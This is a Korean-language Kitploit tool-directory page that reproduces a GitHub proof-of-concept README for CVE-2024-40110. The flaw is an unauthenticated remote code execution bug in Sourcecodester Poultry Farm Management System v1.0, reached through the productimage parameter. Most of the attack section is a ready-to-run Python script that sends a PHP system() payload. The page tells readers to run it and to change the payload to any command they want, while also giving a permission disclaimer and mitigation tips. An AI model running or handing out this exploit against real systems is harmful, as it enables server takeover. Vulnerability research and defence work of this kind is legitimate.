Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-40110 — Sourcecodester Poultry Farm Management System의 취약한 productimage 매개변수를 통한 인증되지 않은 원격 코드 실행을 시연하는 개념 증명 스크립트입니다. | Kitploit
도구/GitHubGitHub/abdurahmon3236/cve-2024-40110
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Sourcecodester Poultry Farm Management System의 취약한 productimage 매개변수를 통한 인증되지 않은 원격 코드 실행을 시연하는 개념 증명 스크립트입니다.

저장소 보기
152년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Sourcecodester Poultry Farm Management System v1.0의 인증되지 않은 원격 코드 실행 취약점 PoC (Proof of Concept)

이 저장소는 Sourcecodester Poultry Farm Management System v1.0에서 인증되지 않은 원격 코드 실행(RCE) 취약점을 증명하는 PoC 스크립트를 포함합니다. 이 취약점은 /farm/product.php의 productimage 매개변수에 존재하며, 공격자가 서버에서 임의 코드를 실행할 수 있게 합니다.

목차

  • 취약점 설명
  • 설정 및 사용법
    • PoC 스크립트
  • 중요 사항
  • 완화 방안

취약점 설명

CVE-ID: (미할당)

개요: Sourcecodester Poultry Farm Management System v1.0은 /farm/product.php의 productimage 매개변수를 통해 인증되지 않은 원격 코드 실행(RCE) 취약점을 포함합니다. 이 취약점으로 인해 공격자는 인증 없이 서버에서 임의 코드를 실행할 수 있습니다.

영향받는 버전:

  • Sourcecodester Poultry Farm Management System v1.0

설정 및 사용법

사전 요구사항

  • Python 3.x
  • requests 라이브러리 (pip install requests)

PoC 스크립트

이 스크립트는 공격자가 취약한 매개변수에 악의적인 요청을 보내 RCE 취약점을 악용하는 방법을 보여줍니다.

다음 스크립트를 rce_poc.py로 저장하고 실행하세요.

import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

설명

  1. 설정: target_url을 취약한 서버의 /farm/product.php 엔드포인트 URL로 설정합니다.
  2. 페이로드: 페이로드는 간단한 PHP 명령 실행 페이로드입니다. 필요에 따라 다른 명령을 실행하도록 페이로드를 수정할 수 있습니다.
  3. 요청 구성: 스크립트는 productimage 매개변수에 악성 페이로드를 포함한 POST 요청을 구성합니다.
  4. 익스플로잇 함수: exploit_rce() 함수는 대상 URL로 악성 요청을 보내고 응답 세부 정보를 출력합니다.
  5. 스크립트 실행: 실행되면 스크립트는 RCE 취약점을 악용하고 결과를 출력합니다.

중요 사항

  • 권한: 대상 시스템에서 이 취약점을 테스트할 명시적 권한이 있는지 확인하십시오. 허가 없는 테스트는 불법이며 비윤리적입니다.
  • 테스트 환경: 프로덕션 시스템에 영향을 미치지 않도록 통제된 환경에서 이 테스트를 수행하십시오.
  • 페이로드 커스터마이징: 원하는 명령 실행을 달성하기 위해 필요에 따라 페이로드를 사용자 지정하십시오.

완화 방안

이 취약점을 완화하려면 다음 단계를 적용하십시오.

  • 입력 검증: 사용자 입력을 정화하기 위해 적절한 입력 검증을 구현합니다.
  • 파일 업로드 제한: 특정 파일 형식만 허용하고 크기 제한을 적용하도록 파일 업로드를 제한합니다.
  • 소프트웨어 업데이트: 보안 패치 및 수정 사항을 적용하기 위해 소프트웨어를 정기적으로 최신 버전으로 업데이트합니다.

이러한 완화 단계와 보안 모범 사례를 따르면 Sourcecodester Poultry Farm Management System v1.0에서 이와 같은 RCE 문제를 예방할 수 있습니다.

도구 다운로드